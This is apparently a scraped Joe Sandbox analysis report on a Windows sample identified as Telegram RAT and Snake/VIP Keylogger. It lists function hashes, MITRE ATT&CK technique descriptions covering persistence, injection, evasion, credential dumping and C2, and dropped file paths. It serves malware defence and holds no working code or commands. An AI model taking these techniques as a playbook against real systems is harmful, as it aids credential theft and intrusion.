Snapshot File: hcaresult_15_2_307d000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 524e41a33c38f1c28dd083a03eb9e9e2b7fff0be85c18bf326476a7d51dea100
Instruction ID: 0315905334f69df30400e22eccfc5e6e6bf95b93440f1fa52a988d15e1af53de
Opcode Fuzzy Hash: 524e41a33c38f1c28dd083a03eb9e9e2b7fff0be85c18bf326476a7d51dea100
Instruction Fuzzy Hash: BC01F271806340EAEB108E25D9C0B66FFD8EF42720F0CC45AED080A286C2789845C6F5

Function 030D95AF Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3389943011.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_30d0000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ce3932e2c344d0c714c5c37d5a9e08c4ba552263eda16b8f5ed512a41822348
Instruction ID: 2b49a2cca970124800213a8aa6eacdc42f325a39b8f7e6d8d01f79447bfbd7c5
Opcode Fuzzy Hash: 4ce3932e2c344d0c714c5c37d5a9e08c4ba552263eda16b8f5ed512a41822348
Instruction Fuzzy Hash: 31E04F3230A2109BD679959EA854ABEA7DAD7C4760B290577F45AC7348DE13CC8183A1

Function 030D2DB8 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3389943011.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_30d0000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 554770e8c6dede3a63ac5ff5538a534831d7c7d629ad266b71b580a17bcd9a5a
Instruction ID: 927e9a2c906632eccff8f40990ebd7a11e1152a43a55fe8ac1e7295dc4de2d40
Opcode Fuzzy Hash: 554770e8c6dede3a63ac5ff5538a534831d7c7d629ad266b71b580a17bcd9a5a
Instruction Fuzzy Hash: 1DE0D836D253A64FCB0297B0F8010DDBB74EE87210F0545A2D810AB150FB35165EC7E3

Function 030D6C47 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3389943011.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_30d0000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9398ef20df35d555cb6534071f94b1b14f9ecbd4e2a2285fc7d74ac29d9b188c
Instruction ID: 56842e80a08b7f0273bd4e863deeaf5f52453a018486b3d58e3b332482ee820d
Opcode Fuzzy Hash: 9398ef20df35d555cb6534071f94b1b14f9ecbd4e2a2285fc7d74ac29d9b188c
Instruction Fuzzy Hash: D7E0D83540430ACFD705EBB0F8C5BD477B1EE85200B048554C0044B125DB795405CF60

Function 030D2DC8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3389943011.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_30d0000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58de2d5be0695b9965d80eb4bfa61cc58e7a994d3425dd7ff7dcd01d56eb3098
Instruction ID: 73aaf64c7bb5018b7e65ebf16bc7ffe48f22b4e9635f271f6c0d446ca8962ddd
Opcode Fuzzy Hash: 58de2d5be0695b9965d80eb4bfa61cc58e7a994d3425dd7ff7dcd01d56eb3098
Instruction Fuzzy Hash: 57D02B31D2022B53CB00E7A1FC004DFF738EEC1220B404222E91033000FB302658C6F0

Function 030D9410 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3389943011.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_30d0000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: ec6ffbf673616e201f0c01f58fd3fafdb371575edd0411636df0fdc81b0c8cb9
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: DFC08C3320E2282BE224908FBC40EA7BBCCD3C13F4A250177F51CC320098429C8002F8

Function 030DB4BD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3389943011.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_30d0000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f4cfec6f0fbce428ae94c525dce10da0c5b4bfb3a4b733c4325960428bab317
Instruction ID: a50828176596652c2a7a3676967cb4aad397d04d9c30039e2652b6f411977e86
Opcode Fuzzy Hash: 5f4cfec6f0fbce428ae94c525dce10da0c5b4bfb3a4b733c4325960428bab317
Instruction Fuzzy Hash: BFD0177BB000089FCB049F88E8409DDB7B6FB8C220B008016E911A3220C6319821CBA0

Function 030D6C58 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3389943011.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_30d0000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2daf5c18c5438a00770b0b069d402785df87f2162ded439eb4455d264bb839a9
Instruction ID: d85583e8e7e1911e03548e32cf0cea900c9dabbd5772a78d5e744363e16bb3de
Opcode Fuzzy Hash: 2daf5c18c5438a00770b0b069d402785df87f2162ded439eb4455d264bb839a9
Instruction Fuzzy Hash: 3EC0223010820B86E104F3B4F844A84732AE6C4202B014624910809004EFBC1C840AF1

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report FT876567090.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EYDNKhhJr.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FT876567090.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1chtvjwe.031.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3gdkh4is.1xv.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3rggcrht.bxx.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4xq0crbr.2dp.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_awuz24uw.qzf.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_brvor20s.1ou.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_deto2wjr.hnr.ps1

Windows Analysis Report
FT876567090.exe

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre